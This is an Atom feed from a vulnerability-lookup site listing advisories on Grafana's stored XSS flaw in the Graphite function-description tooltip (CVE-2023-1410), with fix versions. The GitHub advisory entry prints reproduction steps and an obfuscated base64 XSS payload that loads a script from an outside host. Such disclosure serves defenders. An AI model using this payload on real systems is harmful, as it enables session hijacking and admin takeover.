<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T14:07:11.158637+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2024-02575</id>
    <title>bdu:2024-02575</title>
    <updated>2026-10-03T14:07:11.449077+00:00</updated>
    <content>bdu:2024-02575</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2024-02575"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bit-grafana-2023-1410</id>
    <title>BIT-grafana-2023-1410 — Stored XSS in Graphite FunctionDescription tooltip</title>
    <updated>2026-10-03T14:07:11.449137+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Bitnami: grafana</p>
<p>Grafana is an open-source platform for monitoring and observability.</p>
<p>Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.</p>
<p>The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.</p>
<p>An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.</p>
<p>Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/bit-grafana-2023-1410"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2023-avi-0257</id>
    <title>certfr-2023-avi-0257 — Une vulnérabilité a été découverte dans Grafana. Elle permet à un
attaquant de provoquer une injection de code indirect…</title>
    <updated>2026-10-03T14:07:11.449179+00:00</updated>
    <content>certfr-2023-avi-0257</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2023-avi-0257"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-220480</id>
    <title>EUVD-2026-220480</title>
    <updated>2026-10-03T14:07:11.449197+00:00</updated>
    <content>EUVD-2026-220480</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-220480"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2023-1410</id>
    <title>fkie_cve-2023-1410</title>
    <updated>2026-10-03T14:07:11.449208+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p>Grafana is an open-source platform for monitoring and observability.</p>
<p>Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip.</p>
<p>The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized.</p>
<p>An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.</p>
<p>Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2023-1410"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-qrrg-gw7w-vp76</id>
    <title>GHSA-qrrg-gw7w-vp76 — Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip</title>
    <updated>2026-10-03T14:07:11.449236+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/grafana/grafana</p>
<p>### Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.</p>
<p>### Details</p>
<p>1. Spin up your own Graphite instance. I've done this using the `make devenv sources=graphite`.
2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py` 
3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `"&gt;&lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))&gt;`</p>
<p>The result would look like this:</p>
<p>```python
def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):
  """…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-qrrg-gw7w-vp76"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2023-1410</id>
    <title>gsd-2023-1410</title>
    <updated>2026-10-03T14:07:11.449294+00:00</updated>
    <content>gsd-2023-1410</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2023-1410"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/opensuse-su-2024:12855-1</id>
    <title>openSUSE-SU-2024:12855-1 — grafana-9.4.7-1.1 on GA media</title>
    <updated>2026-10-03T14:07:11.449306+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>grafana-9.4.7-1.1 on GA media</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/opensuse-su-2024:12855-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2023:7741</id>
    <title>RHSA-2023:7741 — Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security, enhancements, and bug fix update</title>
    <updated>2026-10-03T14:07:11.449324+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>grafana: JWT token leak to data source grafana: Stored XSS in Graphite FunctionDescription tooltip grafana: missing access control allows test alerts by underprivileged user grafana: data source proxy race condition golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack)</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2023:7741"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/suse-su-2023:1902-1</id>
    <title>SUSE-SU-2023:1902-1 — Security update for SUSE Manager Client Tools</title>
    <updated>2026-10-03T14:07:11.449349+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Security update for SUSE Manager Client Tools</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/suse-su-2023:1902-1"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-1410</id>
    <title>UBUNTU-CVE-2023-1410</title>
    <updated>2026-10-03T14:07:11.449365+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:16.04:LTS: grafana</p>
<p>Grafana is an open-source platform for monitoring and observability. Grafana had a stored XSS vulnerability in the Graphite FunctionDescription tooltip. The stored XSS vulnerability was possible due the value of the Function Description was not properly sanitized. An attacker needs to have control over the Graphite data source in order to manipulate a function description and a Grafana admin needs to configure the data source, later a Grafana user needs to select a tampered function and hover over the description.   Users may upgrade to version 8.5.22, 9.2.15 and 9.3.11 to receive a fix.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2023-1410"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2023-0726</id>
    <title>WID-SEC-W-2023-0726 — Grafana: Schwachstelle ermöglicht Cross-Site Scripting</title>
    <updated>2026-10-03T14:07:11.449387+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Grafana ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2023-0726"/>
  </entry>
</feed>
